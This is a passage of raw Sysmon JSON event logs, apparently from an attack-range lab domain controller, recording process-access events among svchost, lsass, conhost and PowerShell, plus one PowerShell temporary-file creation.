06:01:11.684","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8367,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8368,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8369,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-0527-5F25-0000-0010C9C41300}\r\nSourceProcessId: 752\r\nSourceThreadId: 4348\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-0010D1C71300}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-0527-5F25-0000-0010C9C41300}","SourceProcessId":"752","SourceThreadId":"4348","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-0010D1C71300}","TargetProcessId":"4892","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8370,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8371,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8372,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8373,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.715\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-0010D1C71300}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.715","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-0010D1C71300}","TargetProcessId":"4892","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8374,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.715\r\nProcessGuid: {A837DB8D-0527-5F25-0000-0010D1C71300}\r\nProcessId: 4892\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_swnf2dtq.pce.ps1\r\nCreationUtcTime: 2020-08-01 06:01:11.715","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.715","ProcessGuid":"{A837DB8D-0527-5F25-0000-0010D1C71300}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_swnf2dtq.pce.ps1","CreationUtcTime":"2020-08-01 06:01:11.715","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8375,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.762\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-0010D1C71300}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 